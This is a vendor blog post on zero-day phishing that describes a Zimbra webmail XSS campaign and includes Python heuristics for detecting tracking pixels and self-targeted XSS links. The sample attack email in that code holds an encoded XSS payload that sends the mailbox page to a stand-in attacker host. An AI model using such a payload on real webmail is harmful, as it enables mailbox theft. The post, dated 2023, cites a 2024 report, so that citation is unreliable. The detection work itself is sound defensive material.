
What is a zero-day phishing attack?

by Egress
Published on 17th Jan 2023

Zero-day vulnerabilities present a very real threat to cybersecurity. Exploiting one takes skill and effort, but because no patch and no detection signature exist yet, it lets attackers enter a system without tripping the defences that depend on known indicators, and often leave little trace behind.

Once cybercriminals have gained access to your system, they can quietly steal data and sell it on the dark web, steal data and hold you to ransom over it, disable your systems and demand payment to restore control, or use your legitimate email domain to phish other individuals and organizations within your supply chain.

Defining zero-day threats and vulnerabilities

A zero-day vulnerability is a security flaw that attackers discover before the software vendor knows about it, so no patch exists and the vendor has had "zero days" to fix it. An exploit written for such a flaw is a zero-day exploit, and an attack that uses one is a zero-day attack; together these make up the zero-day threat. Malicious actors and cybercriminals exploit these flaws hoping to damage systems or steal data.

Phishing and spear-phishing are among the most common ways a zero-day exploit is delivered: the email carries the link or attachment that triggers the flaw. According to our 2024 Email Security Risk Report, 94% of the organizations we surveyed had suffered from phishing attacks. In its 2022 Internet Crime Report, the FBI's Internet Crime Complaint Center (IC3) recorded 800,944 cybercrime complaints, amounting to $10.3 billion in reported losses.

Why zero-day attacks are so dangerous

Cybercriminals routinely hoard intelligence on zero-day vulnerabilities and reserve them for high-value targets, since every use risks the flaw being discovered and patched. It's always the hits you don't see coming that cause the most damage: when an attack exploits a vulnerability nobody else knows about, there is no patch to apply and no signature to detect it, and the vendor has had no time to fix the flaw.

What's worse is that even once the attack does become known, there is usually a window before the vendor can develop, test and ship a fix. That window is open season for copycat attacks, because the details needed to reproduce the exploit are now public while nervous customers are still waiting for a priority patch. Interim mitigations, such as disabling the affected feature or blocking the URL pattern the exploit uses, are often the only protection available during that period.

Why traditional security technology is insufficient for zero-day attack prevention

Many people and organizations mistakenly believe that email is an inherently secure method for business communications. Much of this overconfidence stems from claims made by traditional security technology, but these tools fall short in preventing zero-day attacks. Employees at companies using secure email gateways can still find advanced phishing attacks making it into their inboxes. At that point, a single click can give the attacker a foothold, whether by running malware on the endpoint, harvesting credentials or, as in the case below, executing script inside the user's own webmail session.

Secure email gateways rely on traditional methodologies to prevent attacks. They are largely signature-based: they take samples from attacks already in progress, extract indicators such as sender addresses, URLs, attachment hashes and subject lines, and block future messages that match. The problem is that modern phishing attacks are far more sophisticated than in the past, and attackers rotate their infrastructure and lures so quickly that signature updates can't keep up.

Another way secure email gateways recognize attacks is by observing high-volume spam patterns, such as the same message hitting thousands of mailboxes. Once again, attackers have adjusted and upped their game with low-volume targeted attacks that never reach the volume thresholds spam filters look for. These attackers use tried-and-true confidence tricks, like impersonating trusted individuals or vendors the employees already know.

As fast as vendors can patch their systems, attackers adapt and find new vulnerabilities to exploit. To stop phishing attacks from eroding trust, brand value and company data security, organizations need to move past relying on traditional security tools and look to more intelligent email protection technologies.

Real-world case: Zimbra email theft

A series of spear-phishing campaigns recently targeted European government and media organizations via a zero-day cross-site scripting (XSS) vulnerability in the Zimbra webmail platform. The perpetrators began with an elaborate reconnaissance campaign: emails that contained no malicious links at all, sent to work out which addresses were live and which recipients were most likely to open the follow-on messages.

These emails did not trigger security controls because their only payload was a remote image, the same tracking pixel that marketing emails use for open-rate analytics. The attackers gave each recipient a unique image URL, so a request for that URL told them which addresses were valid and which users rendered remote content.

With a list of responsive targets, the attackers then sent malicious emails in four waves. Each contained a link to attacker-controlled infrastructure that led the victim to a specially crafted URL, which exploited the zero-day flaw to inject JavaScript into the Zimbra webmail page. Because that script ran inside the user's already authenticated session, no malware and no stolen password were needed: a single click was enough for the attackers to read and exfiltrate the contents of the victim's mailbox.

So why didn't secure email gateways and spam filters detect and prevent this attack? Because at every stage it mirrored legitimate business traffic: the reconnaissance emails looked like marketing mail with a tracking pixel, the volumes were low and targeted, and the final link pointed at a trusted, and still unpatched, webmail host rather than at a known-bad URL.
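The two phases of the campaign above each leave a signal that a content-aware filter can look for, even though neither message matches a known-bad signature. The following is an added example written for this article, not Egress code and not the real Zimbra exploit: it parses raw emails, flags a remote image whose URL carries a high-entropy per-recipient token, correlates those tokens across a campaign (one image host, a distinct token for every recipient), and flags a link that points back at the organisation's own webmail host with script-like content in its query string. The sender domains, the webmail host `mail.example.org`, the URL formats and all sample messages are constructed for the example.

```python
"""Triage heuristics for the reconnaissance and exploitation waves described above.

Added example, not Egress code. All hosts, senders, tokens and the 'attack'
URL format are hypothetical and do not reproduce the real Zimbra exploit URL.
"""
import math
import re
from collections import Counter
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import parse_qs, unquote, urlparse

# Assumption: the organisation's own webmail front end. A lure that points back
# at the victim's OWN webmail host is the tell for a reflected XSS attack, since
# the injected script needs the victim's live session to read the mailbox.
OWN_WEBMAIL_HOSTS = {"mail.example.org"}

# Script-ish fragments that have no business in a query string aimed at webmail.
SCRIPT_PATTERN = re.compile(r"<script|javascript:|on(?:error|load)\s*=|document\.cookie", re.I)


class _UrlExtractor(HTMLParser):
    """Collect <img src> and <a href> values from an HTML body."""
    def __init__(self):
        super().__init__()
        self.images, self.links = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "img" and a.get("src"):
            self.images.append(a["src"])
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])


def shannon_entropy(s):
    """Bits per character; random hex or base64 identifiers score roughly 3.5 to 5."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def extract_urls(raw_email):
    """Parse an RFC 822 message and return (image_urls, link_urls) from its HTML parts."""
    msg = message_from_string(raw_email)
    html = ""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            html += part.get_payload(decode=True).decode("utf-8", errors="replace")
    p = _UrlExtractor()
    p.feed(html)
    return p.images, p.links


def tracking_token(url):
    """Return a path segment or query value that looks like a per-recipient ID, else None."""
    u = urlparse(url)
    segments = [s for s in u.path.split("/") if s]
    segments += [v for vals in parse_qs(u.query).values() for v in vals]
    for seg in segments:
        if len(seg) >= 16 and shannon_entropy(seg) >= 3.0:
            return seg
    return None


def analyse(raw_email):
    """Per-message findings: remote tracking pixels and self-targeted XSS-looking links."""
    findings = []
    images, links = extract_urls(raw_email)
    for img in images:
        if urlparse(img).scheme in ("http", "https") and tracking_token(img):
            findings.append(("tracking_pixel", img))
    for link in links:
        u = urlparse(link)
        if u.hostname in OWN_WEBMAIL_HOSTS and SCRIPT_PATTERN.search(unquote(u.query + "#" + u.fragment)):
            findings.append(("webmail_xss_link", link))
    return findings


def recipient_tracking(raw_emails):
    """Campaign-level check: returns {image_host: tokens} for hosts that served a
    distinct token to every recipient (and more than one recipient), i.e. the
    pixel identifies the reader rather than the campaign."""
    recipients, tokens_by_host = set(), {}
    for raw in raw_emails:
        recipients.add(message_from_string(raw)["To"])
        for img in extract_urls(raw)[0]:
            tok = tracking_token(img)
            if tok:
                tokens_by_host.setdefault(urlparse(img).hostname, set()).add(tok)
    return {h: t for h, t in tokens_by_host.items() if len(t) == len(recipients) > 1}


# Constructed sample traffic (not real messages). Wave 1: two reconnaissance mails
# whose only payload is a per-recipient remote image.
RECON_EMAILS = [
    """From: "Industry Digest" <news@digest-example.test>
To: editor@example.org
Subject: This week in policy
Content-Type: text/html; charset=utf-8

<html><body><p>Read this week's briefing.</p>
<img src="https://cdn.digest-example.test/open/4f9a1c7e2b8d03a6e5f1b2c9.gif" width="1" height="1"></body></html>
""",
    """From: "Industry Digest" <news@digest-example.test>
To: analyst@example.org
Subject: This week in policy
Content-Type: text/html; charset=utf-8

<html><body><p>Read this week's briefing.</p>
<img src="https://cdn.digest-example.test/open/c8d2e6f0a4b9137d5e2a6f1b.gif" width="1" height="1"></body></html>
""",
]

# Wave 2: a lure whose link targets the victim's own webmail with a hypothetical
# reflected parameter (illustrative only, not the real vulnerable endpoint).
ATTACK_EMAIL = """From: "Press Office" <press@newsroom-example.test>
To: analyst@example.org
Subject: Embargoed statement
Content-Type: text/html; charset=utf-8

<html><body><p>The statement is available <a href="https://mail.example.org/h/calendar?view=%3Cimg%20src%3Dx%20onerror%3D%22fetch('https://c2.example.test/?d='%2Bdocument.body.innerHTML)%22%3E">here</a>.</p></body></html>
"""

if __name__ == "__main__":
    for raw in RECON_EMAILS + [ATTACK_EMAIL]:
        print(analyse(raw))
    print(recipient_tracking(RECON_EMAILS))
```

Neither signal is conclusive on its own: legitimate newsletters also use per-recipient pixels, and a self-link to webmail is normal for calendar invitations. The value comes from combining them with context the gateway's signatures ignore, such as a sender domain the recipient has never corresponded with, a small distribution list, and a URL aimed at a host that has not yet received a patch.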

Intelligent email protection with Egress Defend

Attackers run circles around traditional email security solutions by exploiting the most significant vulnerability in every system: human behavior. Today's sophisticated attacks combine the techniques of elaborate confidence scams with technical exploits, using email as the way into otherwise protected systems.

Egress Defend combines zero-trust models with advanced machine learning and natural language processing to detect and neutralize even the most sophisticated phishing attacks, and its intelligent detection technologies are straightforward to deploy. Contextual, color-coded banners use nudge theory to reduce risk and reinforce security awareness and training at the moment the user is reading the email.
